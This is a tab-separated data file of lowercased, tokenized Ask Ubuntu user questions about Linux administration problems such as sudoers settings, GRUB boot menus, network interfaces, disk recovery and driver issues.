437282	sudo asks for root password but expects user in sudoers ?	i have the root account enabled . i have degraded the user ( say kenneth ) to a standard account and i have set the defaults rootpw flag in sudoers . when i use sudo it correctly prompt for root password , but then it returns kenneth is not in the sudoers file . this incident will be reported . i 'm asking this question here ( askubuntu ) because i have 3 other linux systems and the same problem does n't occur there . is there any difference ( any significant change that apply only on ubuntu ) that i have to know or i 'm missing something else ? sudoers file # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults rootpw defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges # % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d groups kenneth kenneth : kenneth cdrom dip adm plugdev lpadmin sambashare vboxusers groups root root : root sudo
437283	php codes of unix in ubuntu	i am using windows7 . and vm virtualbox for ubuntu 12.04 . i have one php project which is written in unix . but now i have to host it through ubuntu 12.04 . i have already imported that project into ubuntu server and i am able to access other php pages of ubuntu from windows browser using ip . now the problem is - i am not able to access that particular project . when i try to access it shows a blank page . i am not getting any error messages ( display error is enabled ) for that . please help me.. at-least give me some hint .
437288	can not choose windows in grub	i have installed edubuntu 13.04 in one of my computers . now i am unable to select or rather even move the selection in the grub during boot time . so ubuntu is automatically loaded . i am unable to get into windows 8 . i tried boot repair once and got a link http : //paste.ubuntu.com/7129807/ which i could n't comprehend . what can i do to be able to access windows 8 ? help required .
437290	ubuntu 12.04 mouse pointer disappears	i recently installed ubuntu 12.04 on a dell optiflex 9020 computer . i rapidly switched to gnome classic instead of unity , and i have a problem since then . my mouse pointer disappears every time i : scroll down an internet page hover over an icon that displays a tooltip hover over the icons in the system settings menu left click anywhere on the desktop ( empty zone and icons ) click on a link ... and probably more things i did n't find out yet . the thing is , the problem does n't happen when i use unity ... do you have an solution / suggestion ? thanks !
437295	how do i stop my system from `` redetecting '' the monitor	my ubuntu 12.04 is connected to my monitor via a kvm switch . when i start up with the switch set to the ubuntu system , everything is fine . when i switch away to one of the other systems , however , after a while the ubuntu will set its screen resolution to some very low default . i can always get back the correct screen resolution , but it 's annoying , especially because most of my open windows will be shrunk to fit the lower resolution and moved to the upper left corner of the screen . i 'm guessing that the change to lower resolution occurs because ubuntu is checking the connected monitor and does n't find one when the kvm switch is set to another system . can i stop my system from doing that ? or tell it to keep the current monitor settings even if it temporarily does n't find a connected monitor ? edit : have 14.04 now on another system connected to the same switch ( multi-boot on same machine ) . does n't happen there .
437300	cant play certain dvd 's on ubuntu/mint	i have followed every instruction imaginable but still can not get `` certain '' ( disney is one culprit ) dvd 's to play on my mint/ubuntu setup - they play perfectly on a windows 7 laptop i have tried vlc with menus off , copied the full dvd with dd etc etc its not even worth going through what did n't help handbrake sometimes works but often copies the wrong title vlc sometimes works without menus but then jumbles up the titles as well this is embarrassing , i would n't mind paying a small amount to get the decryption on ubuntu , it is clearly been setup to stop copying - i just want to play the dvd that i rented from the rental shop
437304	can not enable bluetooth anymore	i shutdown my computer with bluetooth unactivate yesterday and now i can not enable it anymore . here is the dmesg error : [ 3.017432 ] bluetooth : core ver 2.16 [ 3.017449 ] bluetooth : hci device and connection manager initialized [ 3.017455 ] bluetooth : hci socket layer initialized [ 3.017457 ] bluetooth : l2cap socket layer initialized [ 3.017460 ] bluetooth : sco socket layer initialized [ 3.019161 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 3.019163 ] bluetooth : bnep filters : protocol multicast [ 3.019169 ] bluetooth : bnep socket layer initialized [ 3.021798 ] bluetooth : rfcomm tty layer initialized [ 3.021806 ] bluetooth : rfcomm socket layer initialized [ 3.021808 ] bluetooth : rfcomm ver 1.11 [ 571.294000 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 571.294884 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 571.440922 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 576.172231 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 576.172291 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 576.318224 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 577.699734 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 577.699799 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 577.847666 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 580.054792 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 580.054813 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 580.087772 ] bluetooth : hci0 sending intel patch command ( 0xfc8e ) failed ( -19 ) [ 582.086522 ] bluetooth : hci0 command 0xfc8e tx timeout [ 584.089803 ] bluetooth : hci0 command 0xfc11 tx timeout [ 590.083633 ] bluetooth : hci0 exiting intel manufacturer mode failed ( -110 ) do you have any idea of how i can reactivate it ?
437306	/dev/mapper/vg_main-lv_main at 100 %	i get this using df -h : root @ server : /home/username # df -h filesystem size used avail use % mounted on /dev/mapper/vg_main-lv_main 39g 39g 0 100 % / udev 993m 4.0k 993m 1 % /dev tmpfs 401m 264k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1002m 0 1002m 0 % /run/shm /dev/sda1 453m 30m 401m 7 % /boot i have tried purge , automremove etc . what is /dev/mapper/vg_main-lv_main and how do i clear it ?
437308	compiz/unity corrupted 13.10	for some reason when i booted my computer this morning my desktop was all messed up ... when i started any program it would be on 4/5 of my screen . my desktop looked horrible with some kind of distortion through the background . i 'd have no more buttons on open windows , no more unity launcher ( i use cairodock as well ) . on this very same forum i found that it was a unity/compiz problem ... so in a terminal i entered this : sudo apt-get install -- reinstall compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default compizconfig-backend-gconf it solved most of my problems ( launcher , dash , background , ... ) but i still ca n't minimize , maximize , close my windows . whatever method of resetting compiz or unity i 've found , i tried but nothing helped . another strange thing happening is whenever i go in to the system settings and change something , the rest of the options dissapear . when i move my cursor over them , they reappear ... any help appreciated !
437314	ca n't set right alt for 'key for typing alternative characters '	if i set right alt key for 'key for typing alternative characters ' , it is not working . but right control ( for example ) works .
437317	ubuntu and torrents	i can not download magnetic links from any site . i have downloaded multiple torrent clients such as vuze , bittorent client , and transmisson which was already downloaded when i got the computer . when i click the magnetic link it brings up a small tab asking me to open it with other software , the problem is my software which i downloaded is not there and it only shows my documents that i saved such as word documents or my music collection . what should i do ?
437318	how to update already installed software via command line ?	i 'm looking for a command line to update my already installed software.i want to update all of them .
437323	is it possible to edit grub.cfg ?	i wish to change a menu entry in grub.cfg , for example : from # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu is wonderful' to # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu is world famous'
437324	terminal error bash : export	whenever i open terminal i get this error : bash : export : `pathhome/amol/downloads/adt-bundle-linux-x86_64-20131030/sdk/tools ' : not a valid identifier what does it mean and how can i do to remove this error ? # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . # if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then # . /etc/bash_completion # fi cat /etc/profile bash : export : `pathhome/amol/downloads/adt-bundle-linux-x86_64-20131030/sdk/tools ' : not a valid identifier amol @ 4m01 : ~ $ sudo -i [ sudo ] password for amol : root @ 4m01 : ~ # cat /etc/profile /etc/profile : system-wide .profile file for the bourne shell ( sh ( 1 ) ) and bourne compatible shells ( bash ( 1 ) , ksh ( 1 ) , ash ( 1 ) , ... ) . if [ `` $ ps1 '' ] ; then if [ `` $ bash '' ] & & [ `` $ bash '' ! = `` /bin/sh '' ] ; then # the file bash.bashrc already sets the default ps1 . # ps1='\h : \w\ $ ' if [ -f /etc/bash.bashrc ] ; then . /etc/bash.bashrc fi else if [ `` id -u '' -eq 0 ] ; then ps1= ' # ' else ps1= ' $ ' fi fi fi the default umask is now handled by pam_umask . see pam_umask ( 8 ) and /etc/login.defs . if [ -d /etc/profile.d ] ; then for i in /etc/profile.d/*.sh ; do if [ -r $ i ] ; then . $ i fi done unset i fi
437331	print xlsx file from command line using ghostscript and libreoffice	i have been searching on how to get libreoffice in headless mode to print to a ghostscript pdf file on ubuntu server 12.04 . can somebody tell me how to do this or if there is an easier way ? i tried with unoconv but the pdf result did n't look right , i am hoping the ghostscript way prints it directly as it looks in excel . thanks
437332	multiple interfaces on ubuntu	there are multiple interfaces on my ubuntu box - ubuntu 12.04.1 lts - and each of them is assigned an ip from the same subnet . # ifconfig eth0 link encap : ethernet hwaddr 00:50:56:9f:0a:0c inet addr:10.28.49.89 bcast:10.28.49.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fe9f : a0c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:54350 errors:0 dropped:0 overruns:0 frame:0 tx packets:11811 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:67368828 ( 67.3 mb ) tx bytes:1210132 ( 1.2 mb ) eth1 link encap : ethernet hwaddr 00:50:56:9f:82 : ae inet addr:10.28.49.97 bcast:10.28.49.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fe9f:82ae/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6657 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2967245 ( 2.9 mb ) tx bytes:468 ( 468.0 b ) eth2 link encap : ethernet hwaddr 00:50:56:9f:52:9b inet addr:10.28.49.98 bcast:10.28.49.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fe9f:529b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6644 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2963870 ( 2.9 mb ) tx bytes:468 ( 468.0 b ) eth3 link encap : ethernet hwaddr 00:50:56:9f:2c : a9 inet addr:10.28.49.100 bcast:10.28.49.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fe9f:2ca9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6626 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2954844 ( 2.9 mb ) tx bytes:936 ( 936.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5487 errors:0 dropped:0 overruns:0 frame:0 tx packets:5487 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:510360 ( 510.3 kb ) tx bytes:510360 ( 510.3 kb ) only eth0 and eth3 interfaces are pingable on the network . given below are the contents of the /etc/network/interfaces file : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 10.28.49.89 netmask 255.255.255.0 network 10.28.49.0 broadcast 10.28.49.255 gateway 10.28.49.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 72.163.128.140 dns-search abc.com auto eth1 iface eth1 inet static address 10.28.49.97 netmask 255.255.255.0 network 10.28.49.0 broadcast 10.28.49.255 auto eth2 iface eth2 inet static address 10.28.49.98 netmask 255.255.255.0 network 10.28.49.0 broadcast 10.28.49.255 auto eth3 iface eth3 inet static address 10.28.49.100 netmask 255.255.255.0 network 10.28.49.0 broadcast 10.28.49.255 route : # ip route show default via 10.28.49.1 dev eth0 metric 100 10.28.49.0/24 dev eth0 proto kernel scope link src 10.28.49.89 10.28.49.0/24 dev eth1 proto kernel scope link src 10.28.49.97 10.28.49.0/24 dev eth2 proto kernel scope link src 10.28.49.98 10.28.49.0/24 dev eth3 proto kernel scope link src 10.28.49.100 further : # ping -i eth0 10.28.49.97 ping 10.28.49.97 ( 10.28.49.97 ) from 10.28.49.89 eth0 : 56 ( 84 ) bytes of data . ^c -- - 10.28.49.97 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1007ms # ping -i eth0 10.28.49.98 ping 10.28.49.98 ( 10.28.49.98 ) from 10.28.49.89 eth0 : 56 ( 84 ) bytes of data . ^c -- - 10.28.49.98 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1007ms my questions are : why are the interfaces eth1 and eth2 not pingable on the network ? why are the interfaces not reachable from the other interface ( s ) as depicted above ? thanks !
437335	sshfs and disk usage	i have a 1tb hard disk mounted on / in the same hard disk i have the home , something like 100gb of data . this is the output of df -l filesystem 1k-blocks used available use % mounted on /dev/sda1 894763672 118698924 730606676 14 % / udev 32955188 4 32955184 1 % /dev tmpfs 13185852 920 13184932 1 % /run none 5120 0 5120 0 % /run/lock none 32964624 216 32964408 1 % /run/shm in my home folder i have an empty folder remoteserver that i use to mount the remote machine i must work with . the remote computer has 2tb hard disk . i do : sshfs remoteuser @ myremoteserveraddress : / /home/user1/remoteserver and then the result of df -l is totally different ! the usage is 100 % ! ! ! i wanted to remotely mount a remote server thanks to sshfs , but once i mount i ca n't create any folder or file because the disk is full . what is happening ? it seems i have the very same problem of this guy : http : //ubuntuforums.org/showthread.php ? t=2147615
437340	how to export an ssl certificate from one to another server ? server migration	i have an ssl certificate on one server and i am migrating this machine . can i simply copy paste that certificate ? when i have ssl mods installed and enabled ? one the old server i use apache and on the new one we have nginex . at what do i have to pay attention too ? ( old server has ubuntu 10.10 new one has 12.04 )
437344	problem with network interface broadcom 14e4 : 4359	i recently bought a lenovo and essential b590 with windows 8 and decided to install ubuntu13.10 as the primary operating system . once deleted windows 8 installed ubuntu and can not see that i automatically connect to a wifi network . using ifconfig i see that i have no network interface for wireless networks ( the ethernet interface works ) . seeking the problem i see that my network blast ( broadcom bcm 43228 14e4 : 4359 ) does not have a driver . someone post some sasbe or driver or program ( whatever ) to work l'network interface ? i want to use ubuntu but this problem forces me to buy a new blast or change operating systems . sincerely , ferran obiols .
437350	ubuntu or windows selection screen	when i turn my laptop on i get that screen if i either want to select windows or linux . the problem is there is like 6 different option to choose from . all i want it windows and linux . i do n't want anything else . another problem is that the very first option which is linux runs perfectly fine ( the os runs and everything 's fine ) but when i select windows i got a complaining screen which does n't allow me to run windows . what 's going on ? here are the photos of what the problem is .
437351	installation decision	it 's my first attempt to install ubuntu 12.04.4 on my pc . there is already win7 and winxp installed . i also have 4 hdd with various partitions . when i used the windows installer method , it completed succesfully . after reboot , i get a grump screen prompt , nothing more . after this it occured to me : what is the correct ubuntu version for my hardware . the pc is not very old , i5 processor , 4gb ram , but 32bit . should i use 64 or 32 bit installation for ubuntu ? thank you alex
437352	software update failed at last	i was trying to update my software using sudo apt-get update & & sudo apt-get upgrade but failed at last.i am getting this error : fetched 1,985 kb in 2min 51s ( 11.6 kb/s ) w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . software updater is n't working either it also shows failed error . my internet connection is fine.then what 's wrong ?
437357	how to put windows back on	i wanted to install ubuntu and windows alongside but i accidently installed ubuntu 13.10 using the option `` lvm '' although i 've not selected erase disk and fresh install . now my systems boots direclt into ubuntu and i 'm unable to see my windows files on hard drive so i 'm unable to access my old data ( documents , movies , music , pictures ) stored on windows 8 ? can someone help me to bring back my old windows ?
437359	startup disk creator `` checksums do not match ''	so i tried to create a bootable usb dirve with startup disk creator on ubuntu 12.04 using a ubuntu 14.04 iso . the first usb drive i tried already had an old boot image on it and startup disk creator gave me the `` checksums do not match '' error . so i tried another usb drive that had never had a boot image installed and it worked ! now when i tried to load a different version onto the second usb drive i get the `` checksums do not match '' error again . so it seems that if a boot image is installed then starup disk creator fails ? how ca i get this to work ?
437361	laptop-friendly alternatives to unity window-placement shortcuts	unity ( i 'm using ubuntu trusty if it matters ) has these very handy shortcuts where you can press ctrl+alt+numpad to place a window in one of 8 predetermined positions . for instance , ctrl+alt+7 will place the window in the top left quarter of the screen , resizing it appropriately . ctrl+alt+8 will place the window in the top half of the screen , maximizing horizontally ; similarly , ctrl-alt-4 will place it in the left half , maximizing vertically . this makes it very easy to `` tile '' windows in a non-overlapping fashion and is a huge time-saver for arranging windows . sadly , these shortcuts are almost unusable on compact laptops ( i.e . without a numpad , so basically everything under 15 '' screen size ) , as they lack a dedicated numpad . some have an `` overlaid '' numpad , accessible by some arcane key combination , which makes things very cumbersome as the sequence becomes `` enable keypad - place window - disable keypad '' . some others simply lack numpad functionality . is there a way or alternative shortcut for unity to use on these systems ? i 'm thinking something using the super key which is already used extensively by unity , but i could n't find such feature .
437366	hex editor with writing to hdd 's	i was wondering if any of u guys know a good hex editor for writing to hdd 's and reading ofcourse . i 've tried wxhexeditor , but it seems it does n't have the ability to write new stuff to the hdd ( with write acces enabled ofc ) . i just need a hex editor that can open full hdd 's or partitions of hdd 's from sata and/or usb that can read the data on it , but aswell beeing able to write new data to it . hope you 'll can help me out here . thx < 3
437376	can i use debdelta to install/update single package ?	debdelta-upgrade can be used to upgrade whole system , while saving time and bandwidth.the debdelta-upgrade man page says , debdelta-upgrade - downloads all deltas that may be used to 'apt-get upgrade ' , and apply them . but can i use debdelta or debdelta-upgrade to install/update single package ?
437383	automate backups of multiple postgresql _clusters_	i 'm looking for a way to automate backing up multiple postgresql clusters . any thoughts/hints before i do the following ? i 've already found the autopostgresqlbackup package . which is a functional shell script that does basic pg_dumpall ( including basic rolling of the pg_dumpall output files ) against one , configured cluster . i was about to `` bend '' it to allow me to specify a command line argument for a configuration file , and then write a wrapper shell script to do them sequentially , but i wanted to ask for input first .
437385	installing the os twice on same hard disk drive	i plan to install ubuntu 13.10 twice on the same hdd . the reason is each installed os will have filesystem tweaks different from the other . below is my plan : first primary ( bootable ) partition will hold grub bootloader of the first installed os . second primary ( bootable ) partition will hold grub bootloader of the second installed os first logical ( non-bootable ) partition will hold the first installed os . second logical ( non-bootable ) partition will hold the second installed os will my computer become confused if i install two grub bootloaders of the same os on to the same partition ? that is why i install each grub bootloader in a separate partition , is that right ?
437386	file limit in dos emulators	i 'm currently trying to run a dos console application which has to open a certain number of files simultaneously ( more than 15 ) . i 've tried with dosbox and dosemu . dosbox is supposed to support 127 simultaneous files , and dosemu has the config.sys file in which you can set this limit . so i tried a little c program that opens files and i got this results : int main ( void ) { file *archivos [ 300 ] ; char numstr [ 15 ] ; int i=0 , nmax=0 ; printf ( `` \ningrese el numero maximo de archivos que desea crear : `` ) ; scanf ( `` % d '' , & nmax ) ; for ( i=0 ; i < nmax ; i++ ) { sprintf ( numstr , `` prueba % d.dat '' , i ) ; if ( ! ( archivos [ i ] =fopen ( numstr , '' w '' ) ) ) { printf ( `` \nno se pudo abrir el archivo % s '' , numstr ) ; printf ( `` \nel numero maximo de archivos abiertos fue : % d '' , i ) ; exit ( 1 ) ; } } printf ( `` \nno ocurrio un error . el numero de archivos abiertos es : % d\n '' , i ) ; for ( i=0 ; i < nmax ; i++ ) fclose ( archivos [ i ] ) ; return ( 0 ) ; } both dosemu and dosbox let me open 15 files only . this is config.sys from dosemu ( where files=100 ) : rem config.sys for dosemu + freedos rem note that the initial `` d : '' is set to `` z : '' at the end switches=/f dos=umb , high dosdata=umb lastdrive=z files=100 stacks=0 buffers=10 device=d : \dosemu\ems.sys devicehigh=d : \dosemu\cdrom.sys install=d : \dosemu\lredir.com z : linux\fs\ $ { dosemu_lib_dir } /drive_z ro shellhigh=z : \command.com /e:1024 /p
437388	installing ubuntu from iso	i 'm using ubuntu for the 1st time . i was trying to install it using the iso that i downloaded from ubuntu website . when i run wubi.exe i 'm getting below error '' not able to download metalink '' .. please suggest me the process iso :
437393	dd'ed the first 200mb of a hdd , is the filesystem recoverable ?	in a moment of stupidity i let a script run dd on one of my ( non backed up : ( ) hdd 's , 3tb in size . it had a single ext4 filesystem on it , which now wo n't mount . things i 've done so far ( without success ) from reading other people 's misery : made a backup of the drive to an image with dd . ran testdisk on the drive , this produced around 20 lines of the following when running analyse ( both quick and deep ) : ext4 0 0 1 364801 80 63 5860533168 [ files ] . it wo n't let me fix it because it says writes are n't allowed when none is picked , any other combination of choices seems to be fruitless too ( e.g . tried choosing intel in the partition type , still a no go ) . by the way , files is the name of my old partition . tried to mount the drive with a backup superblock as shown here : $ sudo mke2fs -n /dev/sdc mke2fs 1.42.8 ( 20-jun-2013 ) /dev/sdc is entire device , not just one partition ! proceed anyway ? ( y , n ) y filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 183148544 inodes , 732566646 blocks 36628332 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 22357 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 , 512000000 , 550731776 , 644972544 this kept saying wrong filesystem type when running mount . created a gpt partition table with gparted and tried to run fsck with a backup superblock , which had a lot of prompts and really weird numbers that did n't make any sense . so i 'm close to giving up unfortunately , because using photorec to try to extract the files without the directory structure is just going to be too time consuming . is there anything else worth trying that i have n't tried/did wrong ?
437395	ati catalyst vs distro compatibility question	i have a question about the catalyst drivers and which ones i can actually use with my my distro . i currently have 12.04 and ubuntu 13.10 installed . when amd / ati tells me that the latest 14.3 beta driver requires : xorg/xserver 7.4 and above ( up to 1.15 ) linux kernel 2.6 or above ( up to 3.13 ) glibc version 2.2 or 2.3 posix shared memory ( /dev/shm ) support is required for 3d applications ... does this mean that if i had a distro with all those things but later , newer version , that the driver would still run ? ipso facto , if i wanted to try the 12.10 driver with the latest , or more current software , would it still work since the requirements are below what amd says is required . for instance , if driver a requires x server 1.13 , and i have 1.15 , would the driver work , or would i need that specific x server ? is this why people downgrade xorg ?
437400	install of ubuntu 13.10	i am running an hp pavilion dv7 laptop with 2 hard drives ( sda , sdb ) . i want to install ubuntu 13.10 64bit on sdb , at present i have windows 7 64bit booting on sda . my question is : if i install 13.10 64bit on sdb , will the boot partition that boots w7 see 13.10 on sdb and allow 13.10 64bit to load burg ? if not , can it be made to do so ? a friend told me that what i 'm trying to do will not work . of course he is n't sure why it wo n't work or how to fix it . if i have not given enough information , or if what i have given is n't clear , please ask me , and i will try to provide a better explanation . thanks for all of your help in the future .
437405	problem with disk unmounting on sleep and mounting on wake	i use a htpc with xbmc on lubuntu 13.10 ( 32 bits ) to watch my dvdrips from an external usb hhd , the problem comes when i put the computer to sleep from between xbmc and then i wake up the system then i see an error message on the resumed xbmc screen that says âunsafe device removal ! â and when i go to the lubuntu desktop i see a dialog window with the available option for removable media . the weird thing is that when i plug in a 16gb penstick from sandisk ( cruzer extreme ) and sleep and wake the computer the error message in xbmc does not appear and neither the window on the desktop , why ca n't my external hhd also stays mounted on sleep ? i would really appreciate some help . ps : i have s3 system power state on bios , i also check the power options with cat /proc/acpi/wakeup and all usb appear to have s3 enabled .
437409	how to configure a trackpoint only mode on thinkpads with clickpads	i own a thinkpad carbon x1 gen2 notebook with the new touchpad ( clickpad ) . the same clickpad seems to be used in the t440 and w540 models as well . i would like to turn off the touchpad but still be able to use the trackpoint . however , the new clickpad notebooks do not have physical mouse buttons . instead regions on the touchpad must be mapped to the mouse buttons left , middle , right . i.e . simply turning off the touchpad in the ubuntu/unity settings would disable the mouse buttons as well . in other words , i want the touchpad to work as a button only with three regions corresponding to the traditional mouse buttons ( scrolling is not important to me ) . there is a lot of info on the web how to configure the touchpad/trackpoint : e.g . thinkwiki or on askubuntu but this information seems to be outdated . what is the proper ( modern ) way to make persistent changes to the touchpad/trackpoint configuration in ubuntu 14.04 ( or 13.10 ) ? i found this solution and tried it with ubuntu 14.04 alpha : section `` inputclass '' identifier `` t440 top buttons '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 60 % 0 0 0 40 % 60 % 0 0 '' # emulate right and midle buttons option `` synaptics area '' `` 0 0 0 1 '' # disable moving but not buttons endsection put the preceding configuration into a file named e.g . 99-carbonx1clickpad.conf and save it in the folder /usr/share/x11/xorg.conf.d/ the effect is that the 3 upper regions of the clickpad are properly mapped but the touchpad movement is not turned off ( i.e . the mouse can still be moved around ) . why is the movement still turned on ? is there some ubuntu specific process that overrides the settings in the xorg.conf.d folder ? update1 : some more research revealed the priorities by which the xorg config is read ( if this is still up to date ) . hence i copied the config file above also to the folder /etc/x11/xorg.conf.d/ furthermore according to a detailed documentation on the archwiki the gnome settings daemon might override the settings of the xserver hence : uncheck active in /org/gnome/settings-daemon/plugins/mouse/ using the dconf-editor . however this still does not turn off the touchpad movements ... is there another configuration key for ubuntu 's unity ? btw : in future a better solution should be available with synaptics 1.8 .
437410	my cache fills up but never goes down	i know ubuntu manages memory autocratically , it stores cache on ram for quick program access , but every time i fill up the cache , it stays filled up , and ubuntu it self cant delete the cache , if i open a program , the computer will slow down extremely . i have 16gb ram , i can use `` sync & & echo 3 | sudo tee /proc/sys/vm/drop_caches '' to clear the cache , but only until its not filled up or i wont be able to open a terminal . this has happened from 12.04 to 13.10 with the same laptop , didnt happen with the previous laptop with the 12.04 . how does linux manage the in cache memory , how does he know when to delete ? i have no idea how to fix this issue..
437411	ubuntu and system ram	i just installed ubuntu 12.04 on an older box , a dell optiplex with a p4 3.04 processor and 4 gb of ram . ubuntu seems only to be recognizing 2.267 gb . what 's up with that ?
437412	image not recognizing ethernet card	i downloaded a ubuntu server image from http : //virtualboxes.org/images/ubuntu-server/ for version 12.10 . first it comes bundled with the keyboard layout set to italian which is a somewhat easy fix but when i went to correct that the ethernet device is not being setup even though i put the info in /etc/networking/interfaces . it is kind of hard to download something if you do n't have a nic card . when i do an ifconfig all i see is the loopback device . this is being run on an hp dl180 running ubuntu 12.04 lts my sco vm recognizes the nic . i have that set to a pc-net card . the hp has two multiport nic cards . i tried using the same nic as the sco vm but still it did not recognize it .
